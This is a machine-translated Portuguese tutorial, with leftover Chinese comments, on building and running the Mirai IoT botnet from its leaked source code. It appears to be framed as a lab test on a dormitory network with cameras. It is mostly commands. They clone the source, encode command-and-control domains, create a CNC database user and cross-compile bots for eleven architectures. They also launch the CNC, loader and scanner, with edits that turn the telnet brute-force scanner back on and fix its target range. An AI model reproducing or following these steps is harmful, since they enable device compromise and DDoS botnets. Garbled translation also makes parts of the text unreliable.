1. Preparação
1. O Mirai usa duas linguagens de programação, C e Go, e usa um banco de dados para armazenar dados, portanto, a instalação prévia do software requer os seguintes comandos:
sudo apt-get install git
sudo apt-get install gcc
sudo apt-get install golang sudo apt-get install electric-fence sudo apt-get install mysql-server mysql-client2. Faça o download do código fonte
git clone https://github.com/jgamblin/Mirai-Source-Code3. Modifique parâmetros e configure o CNC
cd mirai/tools && gcc enc.c -o enc.out //编译enc可执行文件,用于ip地址异或
./enc.out string cnc.changeme.com //会返回一串“\x”字符串 (其实就是加密了 cnc.changeme.com) ./enc.out string report.changeme.com //会返回一串“\x”字符串Substitua tables.c a cadeia "\ x" e outro parâmetro após a linha 18 e a linha 21 no arquivo, respectivamente
Lembre-se: para modificar dois parâmetros! (Parâmetros da cadeia \ x e comprimento seguinte)
4. Configure o banco de dados
cd ../../scripts //进入script目录
gedit db.sql //编辑大db.sql文件Adicionaruse mirai;如下图
service mysql start //启动Mysql 服务
cat db.sql | mysql -uroot -proot
mysql -uroot -proot //以用户名和密码都是`root`登录数据库
INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, ''); //添加的用户 exit //退出O mirai/cnc/main.gonome do usuário e a senha na modificação são os mesmos que os definidos. Após a modificação, como mostrado abaixo
5. Configure o ambiente de compilação cruzada
cd .. && mkdir cross-compmile-bin //这里是在`Mirai-Source-Code`目录下新建
cd cross-compile-binFaça o download dos 11 pacotes compactados a seguir
wget
https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2(Pode ser lento. Vou colocar uma boa aqui. Link: https://pan.baidu.com/s/1Z89uaV7boW2SRjIv6Y0Idigo de
extração de código: 7o34)
cd ../scripts
sudo ./cross-compile.shDurante o processo de compilação, ele solicitará a instalação do mysql.
gedit ~/.bashrc //打开环境变量Coloque o seguinte no final
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin export PATH=$PATH:/etc/xcompile/i586/bin export PATH=$PATH:/etc/xcompile/m68k/bin export PATH=$PATH:/etc/xcompile/mips/bin export PATH=$PATH:/etc/xcompile/mipsel/bin export PATH=$PATH:/etc/xcompile/powerpc/bin export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin export PATH=$PATH:/etc/xcompile/sh4/bin export PATH=$PATH:/etc/xcompile/sparc/bin export GOPATH=$HOME/go
source ~/.bashrc //刷新环境变量6. Compilar CNC e bot
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords cd ../mirai ./build.sh debug telnet cd ../loader ./build.shNeste ponto, o ambiente está totalmente configurado.
2. Explique o
dispositivo:
Computador A: Como o primeiro dispositivo infectado. Execute a ./mirai.dbgdigitalização e a explosão na porta 48101 .
Computador B: Como CNC e Carregador.
Quando CNC: Execute ./cnccomandos de ataque nas portas 23 e 101 e mantenha-se conectado ao bot.
Carregador: ./scanListmonitoramento contínuo na porta 48101 .
Situação da conexão:
1 Os computadores A e B estão conectados à LAN do dormitório através de wifi.
2 As câmeras A e B são conectadas ao roteador do dormitório usando comutadores.
O objetivo final é garantir que os quatro dispositivos estejam conectados entre si na mesma rede.
3. Teste
1. É necessário um pequeno ajuste
porque a inicialização do cnc é realizada no /debug/cncdiretório, mas a fonte absoluta é gravada no código-fonte. (Como mostrado abaixo)
Então, passamos para o próximo miraidiretório . Como mostradoprompt.txt/debug/cnc
2. Inicie o CNC (Computador B)
go build -o debug/cnc cnc/*.go //在mirai 目录下运行
./debug/cncObter como mostrado:
Abra um novo terminal e tente conectar-se (pode exigir direitos de administrador)
telnet cnc.change.com 23Depois de receber o seguinte prompt, pressione Enter, digite seu nome de usuário e senha para efetuar login
Obtenha o feedback na figura abaixo para indicar o login bem-sucedido!
3 Inicie o carregador (Computador B)
cd mirai/debug
sudo ./scanListenVocê pode ver que a porta está executando o programa observando a porta 48101
netstat -lput // 查看端口指令4 Inicie o programa de digitalização (Computador A.)
Como o código-fonte desativa a função do scanner no modo de depuração por padrão, você pode executá-lo após comentar as linhas 157 e 162 em bot / main.c.
Em seguida, recompile e execute para executar da seguinte maneira
no miraidiretório
./build.sh debug telnetmirai/debugExecute da seguinte forma no diretório (observe que você deve usar os direitos de administrador aqui)
sudo ./mirai.dbgEle começará a digitalizar da seguinte maneira:
5 Controlar a varredura de ip
Como o código-fonte é encontrar aleatoriamente um ip para jateamento (a mirai/bot/scanner.c partir da linha 674), após modificar o código, uma varredura de endereço IP pode ser temporariamente corrigida. Após a modificação, o primeiro dígito é fixado em '10' e os resultados são os seguintes:
Referência:
Fonte: Notícias de zinco